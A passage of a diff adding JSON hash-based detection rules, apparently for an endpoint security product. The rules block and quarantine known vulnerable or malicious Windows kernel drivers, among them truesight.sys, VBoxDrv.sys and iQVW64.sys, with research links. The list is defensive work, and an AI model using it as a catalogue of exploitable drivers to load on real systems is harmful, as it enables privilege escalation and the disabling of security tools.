"type": "hash", + "value": "1e9c236ed39507661ec32731033c4a9b9c97a6221def69200e03685c08e0bfa7", + "comment": "Vulnerable Kernel Driver (aka nicm.sys) [https://www.loldrivers.io/drivers/86cff0de-2536-4b8d-a846-a7312c569597/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "692ef2f3-73fb-5e40-b115-a7e1e8a83eb6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.485225Z", + "creation_date": "2026-03-23T11:45:31.485229Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.485239Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "25840fd4b3d38ec389e0c24264e2d1bb1a6fa6942d62c8dcb36dc0033044ffc0", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "693a9dd6-8888-51b9-b490-40efe9c3a364", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + 
"username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.151628Z", + "creation_date": "2026-03-23T11:45:31.151652Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.151661Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c71ce7ec68a7ac488a512a97b0e2e63e6c7fcda46f6192ffdffae4d89fc4d650", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "693d8e1c-85b7-5323-a1f2-8b018ad7d3e2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.145718Z", + "creation_date": "2026-03-23T11:45:32.145720Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.145726Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cba6df77d819fc098c160402a47ccb616414cbe7e42ea91417cbb5941e04ce41", + "comment": "Malicious Kernel Driver (aka driver_1afc1d06.sys) 
[https://www.loldrivers.io/drivers/d7773616-9860-4768-b6a2-d74f32c23b4e/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "694235cd-f3e7-5470-890a-f3b1a16ec980", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.154246Z", + "creation_date": "2026-03-23T11:45:31.154248Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.154253Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c30da1c7ddbc765f29372789babc58dd9300002d200c8f65111e542e335abb86", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "69625a58-e2df-5bef-bdd9-0ca510baecef", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.608404Z", + "creation_date": 
"2026-03-23T11:45:29.608406Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.608412Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e553f5f3b03c3ace8aa47f74df13336873c0ea72c9a192eeb08b59555e007540", + "comment": "VirtualBox VBoxDrv vulnerable driver (aka VBoxDrv.sys) [CVE-2008-3431] [https://www.loldrivers.io/drivers/79542852-3a0c-43bc-bfa3-3eeb0e1d7fd2/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "69665441-1b67-55f0-b0c4-cba7aa46e860", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.968258Z", + "creation_date": "2026-03-23T11:45:29.968260Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.968265Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "910aa4685c735d8c07662aa04fafec463185699ad1a0cd1967b892fc33ec6c3c", + "comment": "ENE Technology Inc Vulnerable I/O Driver (aka ene.sys) [https://swapcontext.blogspot.com/2020/08/ene-technology-inc-vulnerable-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "696ba961-8e87-5a09-85c5-f3f4b8f9c97f", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.479634Z", + "creation_date": "2026-03-23T11:45:31.479638Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.479648Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4eecc35524994dc1aa9a21aeb84d3f46463308ea7fb711ec7d7740727c470aae", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "696c56bf-a3d4-51e1-9e39-72e65068399b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.830752Z", + "creation_date": "2026-03-23T11:45:30.830755Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:30.830760Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "902b3541c697eb5240438850e952dea654b9d4cbb27f1883f642b41da1ce9fd4", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6978114d-3277-5a29-baba-fe59139a80e1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.148834Z", + "creation_date": "2026-03-23T11:45:31.148836Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.148841Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "27ec6df3c20c75a5fda013b1454eec3a5732e3abc6e272e306c86be0b41afaf4", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "697a50bf-e127-5784-9625-795b96f3c50c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.150755Z", + "creation_date": "2026-03-23T11:45:31.150758Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.150763Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8ff1f634c99c0e83bcde4f09c567d42d506619e52a032988963324927e6812cf", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6985fa03-155e-5140-9019-e4539a2bec00", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.972388Z", + "creation_date": "2026-03-23T11:45:29.972390Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.972395Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + 
"references": [], + "type": "hash", + "value": "83aad7f91c4ebec89fb63e60ccc05628281aa0439362097bd91c69f4b74470bb", + "comment": "Intel Ethernet diagnostics vulnerable driver (aka iQVW64.sys) [CVE-2015-2291] [https://www.loldrivers.io/drivers/1d2cdef1-de44-4849-80e5-e2fa288df681/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6995d290-c9be-5c6a-82f3-1e96964c8ea4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.814575Z", + "creation_date": "2026-03-23T11:45:31.814577Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.814586Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "47337163257da1cb0bd32096b8839f15cf41779e13eba540c9b993e011e186e6", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "699c3610-d557-5951-8adb-cdcf28d2c4e4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + 
"rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.834638Z", + "creation_date": "2026-03-23T11:45:30.834641Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.834650Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "73e1bc654fe12c42b4f16a4e5294e2a8087e203447c9ee7357e32fa4fd0bd0c3", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "69ab438e-c7ea-598c-b39e-cff947f039ae", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.153119Z", + "creation_date": "2026-03-23T11:45:31.153122Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.153130Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "556266d9e0ae434c1f5a96ef2dc3d5acc07f2c618f398c0c257fa20448ad978f", + "comment": "Vulnerable Adlice Software 
Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "69b46593-d590-5f1a-a8ff-8e4acb3441ab", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.159122Z", + "creation_date": "2026-03-23T11:45:31.159124Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.159130Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fe6557bc353476efb85bf7e5d4cb864c2a0ed1caca36d6c4f6538fd96ee4ee24", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "69b7f788-6fdc-51ca-a1c0-948af80233d1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", 
+ "last_update": "2026-03-23T11:45:31.809469Z", + "creation_date": "2026-03-23T11:45:31.809471Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.809479Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c3e5821f204424581ca926b85c708e35399f6e959d51e9df0a2e4be5d9f7cca6", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "69c75ef9-497d-5b6c-9f64-a9b3f1a323a4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.149753Z", + "creation_date": "2026-03-23T11:45:31.149755Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.149761Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e11a002974e08ff480342e530fa5848fc8235ff1168286701a74080ead79262e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file 
SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "69c76cec-67d2-5fea-aef7-2c6dc11c2151", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.979291Z", + "creation_date": "2026-03-23T11:45:29.979293Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.979298Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a4ca4a0932afa09e8df3469768f5ac6feaff2b7ae27ac208a218288fc4fbf102", + "comment": "Vulnerable Kernel Driver (aka d.sys) [https://www.loldrivers.io/drivers/7a7630d6-d007-4d84-a17d-81236d9693e1/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "69cb304d-3073-5f46-9589-56fa758a8789", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.823601Z", + "creation_date": "2026-03-23T11:45:31.823603Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": 
"stable", + "hl_testing_start_time": "2026-03-23T11:45:31.823608Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fe1d76944b23d7ddc313ff2c1becc62e9b58cb325b8aa2fae960e22cd7eef0e8", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "69cd690a-8ca9-574a-a00b-20eb4c215ba4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.481841Z", + "creation_date": "2026-03-23T11:45:30.481843Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.481848Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "00c3e86952eebb113d91d118629077b3370ebc41eeacb419762d2de30a43c09c", + "comment": "Vulnerable Kernel Driver (aka RadHwMgr.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "69ce4409-7199-5729-8dac-0e86195c4951", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": 
"quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.980396Z", + "creation_date": "2026-03-23T11:45:29.980398Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.980403Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d59cc3765a2a9fa510273dded5a9f9ac5190f1edf24a00ffd6a1bbd1cb34c757", + "comment": "Vulnerable Kernel Driver (aka rzpnk.sys) [https://www.loldrivers.io/drivers/1c6e1d3b-f825-4065-9e0c-83386883e40f/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "69d0b8e8-800a-5c84-9111-25de8534f9f2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.835610Z", + "creation_date": "2026-03-23T11:45:30.835612Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.835617Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"6d660d8f547ba9791500e2a36a7091142ad565291fadae767a4cdf55e4dfc962", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "69d6419e-92a2-51d9-93cc-4ce9b1452052", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.159993Z", + "creation_date": "2026-03-23T11:45:31.159996Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.160002Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f365cb2c6488bcd20faa434f9f4abaab59360bd2dfb8f484c893ae66f505b6fd", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "69de5ba6-9be5-51c7-a09b-85aa3fda42d9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.621054Z", + "creation_date": "2026-03-23T11:45:29.621056Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.621062Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b2b37ef379ada79d2abe78375312bfcd4b518139bc525a522c2a6329ba097cc4", + "comment": "Fujitsu Vulnerable Physmem drivers (aka ADV64DRV.sys) [https://www.loldrivers.io/drivers/24fb7bab-b8c3-46ea-a370-c84d2f0ff614/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "69dee7f2-7df0-55a0-9c9d-475c79bd56ce", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 